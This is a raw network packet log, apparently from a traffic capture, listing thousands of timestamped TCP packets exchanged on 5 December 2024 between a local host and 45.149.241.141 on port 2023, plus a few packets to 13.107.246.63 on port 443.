                                                                                                              Dec 5, 2024 10:39:29.331414938 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.331499100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.331536055 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.332695961 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.332750082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.332871914 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.333687067 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.333764076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.333791018 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.335037947 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.335381985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.335418940 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.336678982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.336777925 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.336890936 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.337527990 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.337584972 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.337650061 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.338334084 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.338422060 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.338449001 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.339412928 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.339485884 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.339539051 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.340528011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.340615988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.340740919 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.341804981 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.341945887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.341983080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.342829943 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.342946053 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.343065023 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.344388008 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.344515085 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.344587088 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.345412016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.345509052 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.345530033 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.346456051 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.346476078 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.346570969 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.347388983 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.347441912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.347470999 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.348571062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.348681927 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.348704100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.349741936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.349756002 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.349858999 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.350860119 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.350924969 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.351156950 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.352121115 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.352242947 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.352247000 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.353125095 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.353225946 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.353279114 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.354245901 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.354346991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.354386091 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.355446100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.355576038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.355618954 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.356544018 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.356652021 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.356775999 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.357692957 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.357795000 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.357819080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.358835936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.358891964 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.359234095 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.360028028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.360153913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.360193014 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.361160994 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.361226082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.361246109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.362276077 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.362370014 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.362412930 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.363514900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.363614082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.363636971 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.364586115 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.364685059 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.364801884 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.365689039 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.365781069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.365834951 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.366858959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.366988897 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.366992950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.368212938 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.368275881 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.368304014 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.369131088 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.369230032 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.369242907 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.370290995 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.370363951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.370490074 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.371361971 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.371512890 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.411668062 CET4434991913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.412455082 CET49919443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.412492990 CET4434991913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.412928104 CET49919443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.412934065 CET4434991913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.503499985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.503590107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.503810883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.503915071 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.504482031 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.504482031 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.505124092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.505191088 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.506158113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.506253004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.506524086 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.506917953 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.506928921 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.507148981 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.507791042 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.508177996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.508364916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.509190083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.509249926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.509488106 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.509489059 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.510402918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.510552883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.511204004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.511601925 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.511709929 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.511888981 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.513470888 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.513659954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.513875008 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.515189886 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.515239000 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.515304089 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.516439915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.516530991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.516608953 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.517448902 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.517569065 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.517621040 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.518337011 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.518430948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.518661022 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.519228935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.519285917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.519416094 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.520008087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.520116091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.520216942 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.520848036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.520955086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.521020889 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.521908045 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.522083998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.522273064 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.523030996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.523113012 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.523156881 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.524128914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.524188042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.525278091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.525340080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.525361061 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.526362896 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.526418924 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.526468039 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.526551962 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.527570963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.527671099 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.527726889 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.528707027 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.528786898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.528863907 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.529906034 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.530028105 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.530080080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.530953884 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.531023979 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.531579971 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.532035112 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.532084942 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.533190966 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.533241987 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.533349037 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.534406900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.534451962 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.534481049 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.535469055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.535537958 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.535698891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.536650896 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.536704063 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.536839962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.536928892 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.537806034 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.537906885 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.537981033 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.538954020 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.539092064 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.539215088 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.540092945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.540175915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.540390015 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.541198015 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.541313887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.541366100 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.542337894 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.542468071 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.542514086 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.543529034 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.543622017 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.543685913 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.544666052 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.544755936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.544795036 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.545821905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.545893908 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.545977116 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.546926022 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.547029972 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.547115088 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.548146963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.548261881 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.548485041 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.549220085 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.549345016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.549397945 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.550355911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.550494909 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.550544977 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.551515102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.551654100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.551857948 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.552669048 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.552797079 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.552860022 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.553917885 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.554023027 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.554063082 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.554955959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.555140972 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.555322886 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.556045055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.556169987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.556363106 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.557245016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.557257891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.557316065 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.558377028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.558448076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.558584929 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.559508085 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.559603930 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.559640884 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.560691118 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.560786963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.561072111 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.561837912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.561913967 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.561990976 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.562939882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.563126087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.563164949 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.693358898 CET4434992013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.695760965 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.695810080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.695904970 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.696269989 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.696511030 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.696526051 CET49920443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.696546078 CET4434992013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.696576118 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.696616888 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.697046041 CET49920443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.697052956 CET4434992013.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.697673082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.697731972 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.697949886 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.698810101 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.699119091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.699194908 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.699928999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.700037956 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.700056076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.701155901 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.701225996 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.701309919 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.702342987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.702395916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.702397108 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.703423023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.703531981 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.703541994 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.703577042 CET4434992113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.704035997 CET49921443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.704061985 CET4434992113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.704523087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.704624891 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.704787016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.704821110 CET49921443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.704830885 CET4434992113.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.705689907 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.705807924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.705912113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.706799984 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.706882954 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.706989050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.707905054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.707973957 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.707997084 CET20234991245.149.241.141192.168.2.6
